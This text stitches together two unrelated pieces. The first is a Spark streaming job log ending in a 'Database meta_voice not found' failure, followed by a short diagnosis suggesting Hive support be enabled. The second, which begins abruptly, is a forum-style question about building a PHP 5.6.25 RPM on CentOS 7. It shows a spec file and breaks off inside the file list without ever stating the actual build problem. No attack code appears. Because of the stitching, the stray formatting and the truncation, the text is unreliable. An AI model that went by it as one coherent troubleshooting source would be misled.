19/08/13 19:53:27 INFO TaskSetManager: Starting task 5.0 in stage 1.0 (TID 55, datanode01, executor 2, partition 5, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_1_piece0 in memory on datanode02:28863 (size: 1979.0 B, free: 2.5 GB)
19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_1_piece0 in memory on datanode01:20487 (size: 1979.0 B, free: 2.5 GB)
19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_1_piece0 in memory on datanode03:3328 (size: 1979.0 B, free: 2.5 GB)
19/08/13 19:53:27 INFO MapOutputTrackerMasterEndpoint: Asked to send map output locations for shuffle 0 to 10.1.229.163:24656
19/08/13 19:53:27 INFO MapOutputTrackerMasterEndpoint: Asked to send map output locations for shuffle 0 to 10.1.198.144:41122
19/08/13 19:53:27 INFO MapOutputTrackerMasterEndpoint: Asked to send map output locations for shuffle 0 to 10.1.229.158:64276
19/08/13 19:53:27 INFO TaskSetManager: Starting task 7.0 in stage 1.0 (TID 56, datanode03, executor 1, partition 7, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 2.0 in stage 1.0 (TID 53) in 192 ms on datanode03 (executor 1) (1/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 8.0 in stage 1.0 (TID 57, datanode03, executor 1, partition 8, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 7.0 in stage 1.0 (TID 56) in 25 ms on datanode03 (executor 1) (2/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 6.0 in stage 1.0 (TID 58, datanode02, executor 3, partition 6, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 1.0 in stage 1.0 (TID 51) in 220 ms on datanode02 (executor 3) (3/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 14.0 in stage 1.0 (TID 59, datanode03, executor 1, partition 14, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 8.0 in stage 1.0 (TID 57) in 17 ms on datanode03 (executor 1) (4/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 16.0 in stage 1.0 (TID 60, datanode03, executor 1, partition 16, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 14.0 in stage 1.0 (TID 59) in 15 ms on datanode03 (executor 1) (5/20)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 16.0 in stage 1.0 (TID 60) in 21 ms on datanode03 (executor 1) (6/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 9.0 in stage 1.0 (TID 61, datanode02, executor 3, partition 9, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 4.0 in stage 1.0 (TID 54) in 269 ms on datanode02 (executor 3) (7/20)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 0.0 in stage 1.0 (TID 50) in 339 ms on datanode03 (executor 1) (8/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 10.0 in stage 1.0 (TID 62, datanode02, executor 3, partition 10, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 6.0 in stage 1.0 (TID 58) in 56 ms on datanode02 (executor 3) (9/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 11.0 in stage 1.0 (TID 63, datanode01, executor 2, partition 11, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 5.0 in stage 1.0 (TID 55) in 284 ms on datanode01 (executor 2) (10/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 12.0 in stage 1.0 (TID 64, datanode01, executor 2, partition 12, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 3.0 in stage 1.0 (TID 52) in 287 ms on datanode01 (executor 2) (11/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 13.0 in stage 1.0 (TID 65, datanode02, executor 3, partition 13, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 15.0 in stage 1.0 (TID 66, datanode02, executor 3, partition 15, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 10.0 in stage 1.0 (TID 62) in 25 ms on datanode02 (executor 3) (12/20)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 9.0 in stage 1.0 (TID 61) in 29 ms on datanode02 (executor 3) (13/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 17.0 in stage 1.0 (TID 67, datanode02, executor 3, partition 17, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 15.0 in stage 1.0 (TID 66) in 13 ms on datanode02 (executor 3) (14/20)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 13.0 in stage 1.0 (TID 65) in 16 ms on datanode02 (executor 3) (15/20)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 18.0 in stage 1.0 (TID 68, datanode02, executor 3, partition 18, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Starting task 19.0 in stage 1.0 (TID 69, datanode01, executor 2, partition 19, NODE_LOCAL, 7638 bytes)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 11.0 in stage 1.0 (TID 63) in 30 ms on datanode01 (executor 2) (16/20)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 12.0 in stage 1.0 (TID 64) in 30 ms on datanode01 (executor 2) (17/20)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 17.0 in stage 1.0 (TID 67) in 17 ms on datanode02 (executor 3) (18/20)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 19.0 in stage 1.0 (TID 69) in 13 ms on datanode01 (executor 2) (19/20)
19/08/13 19:53:27 INFO TaskSetManager: Finished task 18.0 in stage 1.0 (TID 68) in 20 ms on datanode02 (executor 3) (20/20)
19/08/13 19:53:27 INFO YarnClusterScheduler: Removed TaskSet 1.0, whose tasks have all completed, from pool
19/08/13 19:53:27 INFO DAGScheduler: ResultStage 1 (start at VoiceApplication2.java:128) finished in 0.406 s
19/08/13 19:53:27 INFO DAGScheduler: Job 0 finished: start at VoiceApplication2.java:128, took 1.850883 s
19/08/13 19:53:27 INFO ReceiverTracker: Starting 1 receivers
19/08/13 19:53:27 INFO ReceiverTracker: ReceiverTracker started
19/08/13 19:53:27 INFO KafkaInputDStream: Slide time = 60000 ms
19/08/13 19:53:27 INFO KafkaInputDStream: Storage level = Serialized 1x Replicated
19/08/13 19:53:27 INFO KafkaInputDStream: Checkpoint interval = null
19/08/13 19:53:27 INFO KafkaInputDStream: Remember interval = 60000 ms
19/08/13 19:53:27 INFO KafkaInputDStream: Initialized and validated org.apache.spark.streaming.kafka.KafkaInputDStream@5fd3dc81
19/08/13 19:53:27 INFO ForEachDStream: Slide time = 60000 ms
19/08/13 19:53:27 INFO ForEachDStream: Storage level = Serialized 1x Replicated
19/08/13 19:53:27 INFO ForEachDStream: Checkpoint interval = null
19/08/13 19:53:27 INFO ForEachDStream: Remember interval = 60000 ms
19/08/13 19:53:27 INFO ForEachDStream: Initialized and validated org.apache.spark.streaming.dstream.ForEachDStream@4044ec97
19/08/13 19:53:27 INFO KafkaInputDStream: Slide time = 60000 ms
19/08/13 19:53:27 INFO KafkaInputDStream: Storage level = Serialized 1x Replicated
19/08/13 19:53:27 INFO KafkaInputDStream: Checkpoint interval = null
19/08/13 19:53:27 INFO KafkaInputDStream: Remember interval = 60000 ms
19/08/13 19:53:27 INFO KafkaInputDStream: Initialized and validated org.apache.spark.streaming.kafka.KafkaInputDStream@5fd3dc81
19/08/13 19:53:27 INFO MappedDStream: Slide time = 60000 ms
19/08/13 19:53:27 INFO MappedDStream: Storage level = Serialized 1x Replicated
19/08/13 19:53:27 INFO MappedDStream: Checkpoint interval = null
19/08/13 19:53:27 INFO MappedDStream: Remember interval = 60000 ms
19/08/13 19:53:27 INFO MappedDStream: Initialized and validated org.apache.spark.streaming.dstream.MappedDStream@5dd4b960
19/08/13 19:53:27 INFO ForEachDStream: Slide time = 60000 ms
19/08/13 19:53:27 INFO ForEachDStream: Storage level = Serialized 1x Replicated
19/08/13 19:53:27 INFO ForEachDStream: Checkpoint interval = null
19/08/13 19:53:27 INFO ForEachDStream: Remember interval = 60000 ms
19/08/13 19:53:27 INFO ForEachDStream: Initialized and validated org.apache.spark.streaming.dstream.ForEachDStream@132d0c3c
19/08/13 19:53:27 INFO KafkaInputDStream: Slide time = 60000 ms
19/08/13 19:53:27 INFO KafkaInputDStream: Storage level = Serialized 1x Replicated
19/08/13 19:53:27 INFO KafkaInputDStream: Checkpoint interval = null
19/08/13 19:53:27 INFO KafkaInputDStream: Remember interval = 60000 ms
19/08/13 19:53:27 INFO KafkaInputDStream: Initialized and validated org.apache.spark.streaming.kafka.KafkaInputDStream@5fd3dc81
19/08/13 19:53:27 INFO MappedDStream: Slide time = 60000 ms
19/08/13 19:53:27 INFO MappedDStream: Storage level = Serialized 1x Replicated
19/08/13 19:53:27 INFO MappedDStream: Checkpoint interval = null
19/08/13 19:53:27 INFO MappedDStream: Remember interval = 60000 ms
19/08/13 19:53:27 INFO MappedDStream: Initialized and validated org.apache.spark.streaming.dstream.MappedDStream@5dd4b960
19/08/13 19:53:27 INFO ForEachDStream: Slide time = 60000 ms
19/08/13 19:53:27 INFO ForEachDStream: Storage level = Serialized 1x Replicated
19/08/13 19:53:27 INFO ForEachDStream: Checkpoint interval = null
19/08/13 19:53:27 INFO ForEachDStream: Remember interval = 60000 ms
19/08/13 19:53:27 INFO ForEachDStream: Initialized and validated org.apache.spark.streaming.dstream.ForEachDStream@525bed0c
19/08/13 19:53:27 INFO DAGScheduler: Got job 1 (start at VoiceApplication2.java:128) with 1 output partitions
19/08/13 19:53:27 INFO DAGScheduler: Final stage: ResultStage 2 (start at VoiceApplication2.java:128)
19/08/13 19:53:27 INFO DAGScheduler: Parents of final stage: List()
19/08/13 19:53:27 INFO DAGScheduler: Missing parents: List()
19/08/13 19:53:27 INFO DAGScheduler: Submitting ResultStage 2 (Receiver 0 ParallelCollectionRDD[3] at makeRDD at ReceiverTracker.scala:613), which has no missing parents
19/08/13 19:53:27 INFO ReceiverTracker: Receiver 0 started
19/08/13 19:53:27 INFO MemoryStore: Block broadcast_2 stored as values in memory (estimated size 133.5 KB, free 366.2 MB)
19/08/13 19:53:27 INFO MemoryStore: Block broadcast_2_piece0 stored as bytes in memory (estimated size 36.3 KB, free 366.1 MB)
19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_2_piece0 in memory on datanode02:31984 (size: 36.3 KB, free: 366.3 MB)
19/08/13 19:53:27 INFO SparkContext: Created broadcast 2 from broadcast at DAGScheduler.scala:1039
19/08/13 19:53:27 INFO DAGScheduler: Submitting 1 missing tasks from ResultStage 2 (Receiver 0 ParallelCollectionRDD[3] at makeRDD at ReceiverTracker.scala:613) (first 15 tasks are for partitions Vector(0))
19/08/13 19:53:27 INFO YarnClusterScheduler: Adding task set 2.0 with 1 tasks
19/08/13 19:53:27 INFO TaskSetManager: Starting task 0.0 in stage 2.0 (TID 70, datanode01, executor 2, partition 0, PROCESS_LOCAL, 8757 bytes)
19/08/13 19:53:27 INFO RecurringTimer: Started timer for JobGenerator at time 1565697240000
19/08/13 19:53:27 INFO JobGenerator: Started JobGenerator at 1565697240000 ms
19/08/13 19:53:27 INFO JobScheduler: Started JobScheduler
19/08/13 19:53:27 INFO StreamingContext: StreamingContext started
19/08/13 19:53:27 INFO BlockManagerInfo: Added broadcast_2_piece0 in memory on datanode01:20487 (size: 36.3 KB, free: 2.5 GB)
19/08/13 19:53:27 INFO ReceiverTracker: Registered receiver for stream 0 from 10.1.229.158:64276
19/08/13 19:54:00 INFO JobScheduler: Added jobs for time 1565697240000 ms
19/08/13 19:54:00 INFO JobScheduler: Starting job streaming job 1565697240000 ms.0 from job set of time 1565697240000 ms
19/08/13 19:54:00 INFO JobScheduler: Starting job streaming job 1565697240000 ms.1 from job set of time 1565697240000 ms
19/08/13 19:54:00 INFO JobScheduler: Finished job streaming job 1565697240000 ms.1 from job set of time 1565697240000 ms
19/08/13 19:54:00 INFO JobScheduler: Finished job streaming job 1565697240000 ms.0 from job set of time 1565697240000 ms
19/08/13 19:54:00 INFO JobScheduler: Starting job streaming job 1565697240000 ms.2 from job set of time 1565697240000 ms
19/08/13 19:54:00 INFO SharedState: loading hive config file: file:/data01/hadoop/yarn/local/usercache/hdfs/filecache/85431/__spark_conf__.zip/__hadoop_conf__/hive-site.xml
19/08/13 19:54:00 INFO SharedState: Setting hive.metastore.warehouse.dir ('null') to the value of spark.sql.warehouse.dir ('hdfs://CID-042fb939-95b4-4b74-91b8-9f94b999bdf7/apps/hive/warehouse').
19/08/13 19:54:00 INFO SharedState: Warehouse path is 'hdfs://CID-042fb939-95b4-4b74-91b8-9f94b999bdf7/apps/hive/warehouse'.
19/08/13 19:54:00 INFO StateStoreCoordinatorRef: Registered StateStoreCoordinator endpoint
19/08/13 19:54:00 INFO BlockManagerInfo: Removed broadcast_1_piece0 on datanode02:31984 in memory (size: 1979.0 B, free: 366.3 MB)
19/08/13 19:54:00 INFO BlockManagerInfo: Removed broadcast_1_piece0 on datanode02:28863 in memory (size: 1979.0 B, free: 2.5 GB)
19/08/13 19:54:00 INFO BlockManagerInfo: Removed broadcast_1_piece0 on datanode01:20487 in memory (size: 1979.0 B, free: 2.5 GB)
19/08/13 19:54:00 INFO BlockManagerInfo: Removed broadcast_1_piece0 on datanode03:3328 in memory (size: 1979.0 B, free: 2.5 GB)
19/08/13 19:54:02 INFO CodeGenerator: Code generated in 175.416957 ms
19/08/13 19:54:02 INFO JobScheduler: Finished job streaming job 1565697240000 ms.2 from job set of time 1565697240000 ms
19/08/13 19:54:02 ERROR JobScheduler: Error running job streaming job 1565697240000 ms.2
org.apache.spark.sql.catalyst.analysis.NoSuchDatabaseException: Database 'meta_voice' not found;
    at org.apache.spark.sql.catalyst.catalog.ExternalCatalog.requireDbExists(ExternalCatalog.scala:40)
    at org.apache.spark.sql.catalyst.catalog.InMemoryCatalog.tableExists(InMemoryCatalog.scala:331)
    at org.apache.spark.sql.catalyst.catalog.SessionCatalog.tableExists(SessionCatalog.scala:388)
    at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:398)
    at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:393)
    at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:122)
    at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:115)
    at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280)
    at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply$mcV$sp(ForEachDStream.scala:51)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51)
    at org.apache.spark.streaming.dstream.DStream.createRDDWithLocalProperties(DStream.scala:416)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply$mcV$sp(ForEachDStream.scala:50)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50)
    at scala.util.Try$.apply(Try.scala:192)
    at org.apache.spark.streaming.scheduler.Job.run(Job.scala:39)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply$mcV$sp(JobScheduler.scala:257)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257)
    at scala.util.DynamicVariable.withValue(DynamicVariable.scala:58)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler.run(JobScheduler.scala:256)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at java.lang.Thread.run(Thread.java:748)
19/08/13 19:54:02 ERROR ApplicationMaster: User class threw exception: org.apache.spark.sql.catalyst.analysis.NoSuchDatabaseException: Database 'meta_voice' not found;
org.apache.spark.sql.catalyst.analysis.NoSuchDatabaseException: Database 'meta_voice' not found;
    at org.apache.spark.sql.catalyst.catalog.ExternalCatalog.requireDbExists(ExternalCatalog.scala:40)
    at org.apache.spark.sql.catalyst.catalog.InMemoryCatalog.tableExists(InMemoryCatalog.scala:331)
    at org.apache.spark.sql.catalyst.catalog.SessionCatalog.tableExists(SessionCatalog.scala:388)
    at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:398)
    at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:393)
    at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:122)
    at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:115)
    at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280)
    at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply$mcV$sp(ForEachDStream.scala:51)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51)
    at org.apache.spark.streaming.dstream.DStream.createRDDWithLocalProperties(DStream.scala:416)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply$mcV$sp(ForEachDStream.scala:50)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50)
    at scala.util.Try$.apply(Try.scala:192)
    at org.apache.spark.streaming.scheduler.Job.run(Job.scala:39)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply$mcV$sp(JobScheduler.scala:257)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257)
    at scala.util.DynamicVariable.withValue(DynamicVariable.scala:58)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler.run(JobScheduler.scala:256)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at java.lang.Thread.run(Thread.java:748)
19/08/13 19:54:02 INFO ApplicationMaster: Final app status: FAILED, exitCode: 15, (reason: User class threw exception: org.apache.spark.sql.catalyst.analysis.NoSuchDatabaseException: Database 'meta_voice' not found;
    at org.apache.spark.sql.catalyst.catalog.ExternalCatalog.requireDbExists(ExternalCatalog.scala:40)
    at org.apache.spark.sql.catalyst.catalog.InMemoryCatalog.tableExists(InMemoryCatalog.scala:331)
    at org.apache.spark.sql.catalyst.catalog.SessionCatalog.tableExists(SessionCatalog.scala:388)
    at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:398)
    at org.apache.spark.sql.DataFrameWriter.saveAsTable(DataFrameWriter.scala:393)
    at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:122)
    at com.stream.VoiceApplication2$2.call(VoiceApplication2.java:115)
    at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280)
    at org.apache.spark.streaming.api.java.JavaDStreamLike$$anonfun$foreachRDD$2.apply(JavaDStreamLike.scala:280)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply$mcV$sp(ForEachDStream.scala:51)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1$$anonfun$apply$mcV$sp$1.apply(ForEachDStream.scala:51)
    at org.apache.spark.streaming.dstream.DStream.createRDDWithLocalProperties(DStream.scala:416)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply$mcV$sp(ForEachDStream.scala:50)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50)
    at org.apache.spark.streaming.dstream.ForEachDStream$$anonfun$1.apply(ForEachDStream.scala:50)
    at scala.util.Try$.apply(Try.scala:192)
    at org.apache.spark.streaming.scheduler.Job.run(Job.scala:39)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply$mcV$sp(JobScheduler.scala:257)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler$$anonfun$run$1.apply(JobScheduler.scala:257)
    at scala.util.DynamicVariable.withValue(DynamicVariable.scala:58)
    at org.apache.spark.streaming.scheduler.JobScheduler$JobHandler.run(JobScheduler.scala:256)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at java.lang.Thread.run(Thread.java:748)
    )
19/08/13 19:54:02 INFO StreamingContext: Invoking stop(stopGracefully=true) from shutdown hook
19/08/13 19:54:02 INFO ReceiverTracker: Sent stop signal to all 1 receivers
19/08/13 19:54:02 ERROR ReceiverTracker: Deregistered receiver for stream 0: Stopped by driver
19/08/13 19:54:02 INFO TaskSetManager: Finished task 0.0 in stage 2.0 (TID 70) in 35055 ms on datanode01 (executor 2) (1/1)
19/08/13 19:54:02 INFO YarnClusterScheduler: Removed TaskSet 2.0, whose tasks have all completed, from pool
19/08/13 19:54:02 INFO DAGScheduler: ResultStage 2 (start at VoiceApplication2.java:128) finished in 35.086 s
19/08/13 19:54:02 INFO ReceiverTracker: Waiting for receiver job to terminate gracefully
19/08/13 19:54:02 INFO ReceiverTracker: Waited for receiver job to terminate gracefully
19/08/13 19:54:02 INFO ReceiverTracker: All of the receivers have deregistered successfully
19/08/13 19:54:02 INFO ReceiverTracker: ReceiverTracker stopped
19/08/13 19:54:02 INFO JobGenerator: Stopping JobGenerator gracefully
19/08/13 19:54:02 INFO JobGenerator: Waiting for all received blocks to be consumed for job generation
19/08/13 19:54:02 INFO JobGenerator: Waited for all received blocks to be consumed for job generation
19/08/13 19:54:12 WARN ShutdownHookManager: ShutdownHook '$anon$2' timeout, java.util.concurrent.TimeoutException
java.util.concurrent.TimeoutException
    at java.util.concurrent.FutureTask.get(FutureTask.java:205)
    at org.apache.hadoop.util.ShutdownHookManager$1.run(ShutdownHookManager.java:67)
19/08/13 19:54:12 ERROR Utils: Uncaught exception in thread pool-1-thread-1
java.lang.InterruptedException
    at java.lang.Object.wait(Native Method)
    at java.lang.Thread.join(Thread.java:1252)
    at java.lang.Thread.join(Thread.java:1326)
    at org.apache.spark.streaming.util.RecurringTimer.stop(RecurringTimer.scala:86)
    at org.apache.spark.streaming.scheduler.JobGenerator.stop(JobGenerator.scala:137)
    at org.apache.spark.streaming.scheduler.JobScheduler.stop(JobScheduler.scala:123)
    at org.apache.spark.streaming.StreamingContext$$anonfun$stop$1.apply$mcV$sp(StreamingContext.scala:681)
    at org.apache.spark.util.Utils$.tryLogNonFatalError(Utils.scala:1357)
    at org.apache.spark.streaming.StreamingContext.stop(StreamingContext.scala:680)
    at org.apache.spark.streaming.StreamingContext.org$apache$spark$streaming$StreamingContext$$stopOnShutdown(StreamingContext.scala:714)
    at org.apache.spark.streaming.StreamingContext$$anonfun$start$1.apply$mcV$sp(StreamingContext.scala:599)
    at org.apache.spark.util.SparkShutdownHook.run(ShutdownHookManager.scala:216)
    at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1$$anonfun$apply$mcV$sp$1.apply$mcV$sp(ShutdownHookManager.scala:188)
    at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1$$anonfun$apply$mcV$sp$1.apply(ShutdownHookManager.scala:188)
    at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1$$anonfun$apply$mcV$sp$1.apply(ShutdownHookManager.scala:188)
    at org.apache.spark.util.Utils$.logUncaughtExceptions(Utils.scala:1988)
    at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1.apply$mcV$sp(ShutdownHookManager.scala:188)
    at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1.apply(ShutdownHookManager.scala:188)
    at org.apache.spark.util.SparkShutdownHookManager$$anonfun$runAll$1.apply(ShutdownHookManager.scala:188)
    at scala.util.Try$.apply(Try.scala:192)
    at org.apache.spark.util.SparkShutdownHookManager.runAll(ShutdownHookManager.scala:188)
    at org.apache.spark.util.SparkShutdownHookManager$$anon$2.run(ShutdownHookManager.scala:178)
    at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
    at java.util.concurrent.FutureTask.run(FutureTask.java:266)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at java.lang.Thread.run(Thread.java:748)
```
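Reading the stack trace, `saveAsTable` is resolving the table through `InMemoryCatalog`, i.e. the `SparkSession` was built without Hive support, so Spark looks up `meta_voice` in its default in-memory catalog rather than in the Hive metastore (even though a hive-site.xml is on the classpath, per the `SharedState` lines). A sketch of a possible fix, offered as a guess since the session-building code in VoiceApplication2.java is not shown:

```
// Sketch (assumes the spark-hive dependency is on the classpath and
// hive-site.xml is visible to the driver): build the session with Hive
// support so saveAsTable resolves databases against the Hive metastore
// instead of Spark's default InMemoryCatalog.
SparkSession spark = SparkSession.builder()
        .appName("VoiceApplication2")
        .enableHiveSupport()
        .getOrCreate();
```

`enableHiveSupport()` simply sets `spark.sql.catalogImplementation` to `hive`; without it the 'meta_voice' database would have to exist in Spark's own in-memory catalog, which is empty at startup.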
Problem building an RPM package with rpmbuild on CentOS 7 (urgent)
Environment: CentOS 7.1, php-5.6.25

```
$ ls rpmbuild/
BUILD  BUILDROOT  RPMS  SOURCES  SPECS  SRPMS
$ cat rpmbuild/SPECS/php.spec
Name: php
Version: 5.6.25
Release: 1%{?dist}
Summary: compiled from 5.6.25 by Kevin
Group: System Environment/Daemons
License: GPL
URL: https://secure.php.net
Source0: php-5.6.25.tar.gz
BuildRoot: %(mktemp -ud %{_tmppath}/%{name}-%{version}-%{release}-XXXXXX)
BuildRequires: gcc, gcc-c++, openssl-devel
Requires: wireshark-gnome

%description
php server. Compiled from 5.6.25 by Kevin

%prep
%setup -q

%build
./configure '--with-libdir=lib64' '--prefix=/usr/local/php5.6' '--with-fpm-systemd' '--enable-fpm' '--enable-mbstring' '--with-mysql' '--with-mysqli' '--with-pdo-mysql' '--with-gd' '--enable-gd-native-ttf' '--with-freetype-dir' '--with-curl' '--with-openssl' '--with-mcrypt' '--enable-zip' '--enable-intl'
make %{?_smp_mflags}

%install
rm -rf %{buildroot}
make install DESTDIR=%{buildroot}

%clean
rm -rf %{buildroot}

%files
%defattr(-,root,root,-)
%defattr(-,root,root,-)
/usr/local/php5.6/bin/*
/usr/local/php5.6/sbin/*
/usr/local/php5.6/include/*
/usr/local/php5.6/php/php/fpm/*
/usr/local/php5.6/php/man/man1/*
/usr/local/php5.6/php/man/man8/*
/usr/local/php5.6/lib/php/*
/usr/local/php5.6/lib/php/extensions/*
/usr/local/php5.6/lib/php/extensions/no-debug-non-zts-20131226/*
/usr/local/php5.6/lib/php/build/*
/usr/local/php5.6/lib/php/build/shtool/*
/usr/local/php5.6/lib/php/.registry/*
/usr/local/php5.6/lib/php/.channels/*
/usr/local/php5.6/lib/php/Archive/*
/usr/local/php5.6/lib/php/doc/*
/usr/local/php5.6/lib/php/doc/Archive_Tar/*
/usr/local/php5.6/lib/php/doc/Archive_Tar/docs/*
/usr/local/php5.6/lib/php/doc/Structures_Graph/*
/usr/local/php5.6/lib/php/doc/Structures_Graph/docs/*
/usr/local/php5.6/lib/php/doc/Structures_Graph/docs/tutorials/*
/usr/local/php5.6/lib/php/doc/Structures_Graph/docs/tutorials/Structures_Graph/*
/usr/local/php5.6/lib/php/doc/Structures_Graph/LICENSE/*
/usr/local/php5.6/lib/php/doc/XML_Util/*
/usr/local/php5.6/lib/php/doc/XML_Util/examples/*
/usr/local/php5.6/lib/php/doc/PEAR/*
/usr/local/php5.6/lib/php/doc/PEAR/LICENSE/*
/usr/local/php5.6/lib/php/doc/PEAR/INSTALL/*
/usr/local/php5.6/lib/php/Console/*
/usr/local/php5.6/lib/php/test/*
/usr/local/php5.6/lib/php/test/Console_Getopt/*
/usr/local/php5.6/lib/php/test/Console_Getopt/tests/*
/usr/local/php5.6/lib/php/test/Structures_Graph/*
